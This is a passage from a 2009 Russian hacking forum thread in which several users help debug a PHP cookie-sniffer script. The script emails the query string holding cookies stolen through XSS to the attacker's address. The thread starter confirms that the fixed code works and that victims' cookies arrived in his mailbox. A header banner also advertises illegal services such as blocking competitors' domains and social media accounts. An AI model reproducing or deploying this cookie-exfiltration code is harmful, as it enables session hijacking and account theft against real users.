Форум АНТИЧАТ - XSS методом POST, неувязка

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
XSS методом POST, неувязка

Страница 2 из 2

Опции темы

Поиск в этой теме

Опции просмотра

#11

17.11.2009, 19:17

Nightmarе

Познавший АНТИЧАТ

Регистрация: 29.04.2007

Сообщений: 1,189

Провел на форуме:
5749763

Репутация: 1680

Отправить сообщение для Nightmarе с помощью ICQ

{ mail ($mailaddr, "Uzer waz XSSed! Eat his cookies!

", "$_SERVER
['QUERY_STRING']"); }
?>

это одной строкой, перенос линии в самом коде не делается посреди кода.

#12

17.11.2009, 19:19

xa-xa89

Участник форума

Регистрация: 17.05.2008

Сообщений: 102

Провел на форуме:
1054394

Репутация: 74

Отправить сообщение для xa-xa89 с помощью ICQ

Цитата:

{ mail ($mailaddr, "Uzer waz XSSed! Eat his cookies!

", "$_SERVER
['QUERY_STRING']"); }

в одну строку напиши

#13

17.11.2009, 19:29

Nik(rus)

Познающий

Регистрация: 19.06.2009

Сообщений: 34

Провел на форуме:
88269

Репутация: 10

PHP код:


		
			
if ($mail) {

mail ($mailaddr, "Uzer waz XSSed! Eat his cookies! :)", $_SERVER

['QUERY_STRING']);

}

Вроде так должно быть Оо

#14

17.11.2009, 19:37

G4bR1eL

Познающий

Регистрация: 25.03.2008

Сообщений: 65

Провел на форуме:
190034

Репутация: 3

Ооо супер, Nik(rus) спасибо. Ошибка пропала. А главное кукисы на мыло пришли.
Nightmare спасибо большое за идею и xa-xa89 тоже огромнейшее спасибо. Всем по плюсегу от юзверя))

#15

17.11.2009, 20:24

gisTy

Постоянный

Регистрация: 24.05.2008

Сообщений: 589

Провел на форуме:
3629857

Репутация: 504

PHP код:


		
			
{ mail ($mailaddr, "Uzer waz XSSed! Eat his cookies! :)", "$_SERVER

['QUERY_STRING']"); }

?>

убери перенос строки
и зачем "$_SERVER['QUERY_STRING'] брать в кавычки?

UP
млять, опоздал

Страница 2 из 2

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Энциклопедия уязвимых скриптов	DIAgen	Сценарии/CMF/СMS	401	17.06.2010 17:39
Пассивиная Xss для браузера IE методом обхода граффического фильтра	__XT__	Уязвимости	13	27.11.2006 03:04
Xss для новичков	Micr0b	Уязвимости	0	04.06.2006 18:25
Xss Расширенный межсайтовый скриптинг	SNIFF	Чужие Статьи	0	24.11.2005 08:08
Cross Site Scripting FAQ	k00p3r	Уязвимости	6	12.06.2005 16:23

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход